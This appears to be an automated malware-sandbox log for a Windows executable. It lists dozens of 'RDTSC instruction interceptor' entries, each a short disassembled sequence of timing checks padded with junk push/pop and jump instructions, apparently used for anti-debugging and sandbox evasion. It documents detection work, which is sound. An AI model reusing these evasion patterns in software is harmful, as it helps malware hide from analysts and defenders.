Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 985149 second address: 98514D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D0F16 second address: 9ACBD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jnl 00007F98991A2756h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 pop esi 0x00000014 nop 0x00000015 lea eax, dword ptr [ebp+12487D0Ah] 0x0000001b nop 0x0000001c push esi 0x0000001d jnl 00007F98991A2765h 0x00000023 jmp 00007F98991A275Fh 0x00000028 pop esi 0x00000029 push eax 0x0000002a push esi 0x0000002b jmp 00007F98991A275Eh 0x00000030 pop esi 0x00000031 nop 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F98991A2758h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov ecx, dword ptr [ebp+122D387Ah] 0x00000052 call dword ptr [ebp+122D2879h] 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushad 0x0000005c popad 0x0000005d jmp 00007F98991A275Eh 0x00000062 jmp 00007F98991A2769h 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D1C69 second address: 9D1C77 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9899183FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 9D1C77 second address: 9D1C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A268C6 second address: A268F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF9h 0x00000007 push esi 0x00000008 jns 00007F9899183FE6h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007F9899183FE6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A268F5 second address: A26903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F98991A275Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A26903 second address: A26909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A26C2A second address: A26C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98991A275Fh 0x00000009 ja 00007F98991A275Ch 0x0000000f jng 00007F98991A276Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A26C55 second address: A26C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A26C59 second address: A26C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2F731 second address: A2F735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2F735 second address: A2F746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jnp 00007F98991A2756h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2F746 second address: A2F755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2F755 second address: A2F76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F98991A2762h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2D82C second address: A2D858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9899183FF2h 0x00000009 jmp 00007F9899183FF5h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2DB60 second address: A2DB85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F98991A2770h 0x0000000b jmp 00007F98991A2768h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2DDDE second address: A2DDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2E92C second address: A2E932 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2F16E second address: A2F172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A2F172 second address: A2F182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F98991A2756h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A328E7 second address: A328EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A328EB second address: A3291A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98991A2756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnl 00007F98991A2756h 0x00000011 ja 00007F98991A2756h 0x00000017 jmp 00007F98991A2765h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32DB1 second address: A32DB7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32DB7 second address: A32DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32DBD second address: A32DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9899183FE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32DC7 second address: A32DE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2765h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32DE0 second address: A32E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F9899183FEEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F9899183FF4h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32E0F second address: A32E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A32E13 second address: A32E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A33146 second address: A3315D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Eh 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A3359D second address: A335A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A335A8 second address: A335AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A335AC second address: A335CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A335CB second address: A335CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A335CF second address: A335D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A42FA5 second address: A42FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F98991A2756h 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 jo 00007F98991A2756h 0x0000001a push esi 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A415BC second address: A415C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A4205C second address: A42060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A48A38 second address: A48A42 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9899183FE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A48A42 second address: A48A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A48A4C second address: A48A50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A48A50 second address: A48A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A545DA second address: A54625 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FEBh 0x00000007 jmp 00007F9899183FEAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9899183FF6h 0x00000017 jmp 00007F9899183FF8h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A54625 second address: A54635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F98991A2758h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57B8D second address: A57B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57B91 second address: A57BB0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F98991A2756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98991A2761h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57BB0 second address: A57BBF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9899183FE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57BBF second address: A57BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57709 second address: A5770F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A5770F second address: A57716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57716 second address: A57726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F9899183FE6h 0x0000000a jl 00007F9899183FE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A57726 second address: A57761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F98991A2769h 0x0000000e jmp 00007F98991A2761h 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F98991A2756h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A5AEA6 second address: A5AEBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007F9899183FEFh 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A5AEBF second address: A5AEC9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98991A276Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A60EF0 second address: A60EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9899183FE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A67CD0 second address: A67CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A703AE second address: A703BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F9899183FE6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A70241 second address: A70250 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jnp 00007F98991A2756h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A75AA6 second address: A75ABA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A75ABA second address: A75ADF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F98991A2769h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A75DC7 second address: A75DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9899183FE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A75DD3 second address: A75DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F98991A275Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A75DE7 second address: A75E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F9899183FF5h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A75E03 second address: A75E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98991A2765h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A79F6F second address: A79F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A79F74 second address: A79F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A79F7B second address: A79F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A79C3A second address: A79C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98991A275Dh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98991A2768h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A79C68 second address: A79C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A86C95 second address: A86CB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F98991A275Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A86CB5 second address: A86CCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9899183FF3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A80419 second address: A80429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A80429 second address: A80458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F9899183FF7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A971A4 second address: A971AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A971AA second address: A971AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A972FD second address: A97316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F98991A2763h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A97316 second address: A9731C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9731C second address: A97347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2761h 0x00000007 push edx 0x00000008 jmp 00007F98991A2765h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A97347 second address: A97357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 jg 00007F9899183FECh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9EEDA second address: A9EF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2762h 0x00000007 jmp 00007F98991A2765h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F98991A275Bh 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9EF19 second address: A9EF1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9E0BF second address: A9E0E7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F98991A2756h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F98991A2761h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F98991A2758h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9E0E7 second address: A9E0ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9E0ED second address: A9E0F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: A9E0F1 second address: A9E0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60C06 second address: 4D60C7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushfd 0x00000008 jmp 00007F9899183FF7h 0x0000000d adc ecx, 5154EB0Eh 0x00000013 jmp 00007F9899183FF9h 0x00000018 popfd 0x00000019 pop esi 0x0000001a popad 0x0000001b push esi 0x0000001c jmp 00007F9899183FECh 0x00000021 mov dword ptr [esp], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 call 00007F9899183FEDh 0x0000002c pop ecx 0x0000002d jmp 00007F9899183FF1h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60C7A second address: 4D60CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F98991A2767h 0x00000009 add cx, D32Eh 0x0000000e jmp 00007F98991A2769h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F98991A2768h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60CD4 second address: 4D60CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60CDA second address: 4D60CE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60CE9 second address: 4D60CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60CED second address: 4D60D08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
